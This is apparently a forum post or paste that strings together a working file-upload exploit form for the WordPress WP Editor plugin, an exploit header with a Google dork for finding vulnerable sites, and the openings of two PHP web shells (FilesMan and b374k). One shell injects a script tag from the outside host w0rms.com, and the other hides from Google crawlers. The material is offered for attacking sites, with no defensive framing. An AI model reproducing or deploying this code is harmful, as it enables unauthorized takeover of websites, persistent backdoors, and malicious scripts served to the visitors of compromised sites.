ichsanbahri

<html>
<body>
<form action="http://[path to WordPress]" method="POST" enctype="multipart/form-data">
<input type="hidden" name="dm_upload" />
<input type="file" name="upfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
 

ichsanbahri

#########################################################
# Exploit Title: Wordpress WP Editor Authenticated Arbitrary File Upload Vulnerability
# Category: webapps
# Software Link: https://wordpress.org/plugins/wp-editor/
# version affected : 1.2.5.x
# Google Dork : inurl:/wp-content/plugins/wp-editor/
########################################################
 
-------------------------------------------------------------------------------
 

ichsanbahri

<?php 
$â–› = "63a9f0ea7bb98050796b649e85481845"; //root 
$â–˜ = true; 
$▜ = 'UTF-8'; 
$â–š = 'FilesMan'; 
$â–™ = md5($_SERVER['HTTP_USER_AGENT']); 
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) { 
    prototype(md5($_SERVER['HTTP_HOST'])."key", $â–™); 
} 
echo "<SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>";

ichsanbahri

<?php 

/* (Web Shell b374k r3c0d3d by x'1n73ct|default pass:" 1n73ction ") */ 
$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc"; 
$color = "#00ff00"; 
$default_action = 'FilesMan'; 
@define('SELF_PATH', __FILE__); 
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { 
    header('HTTP/1.0 404 Not Found'); 
    exit;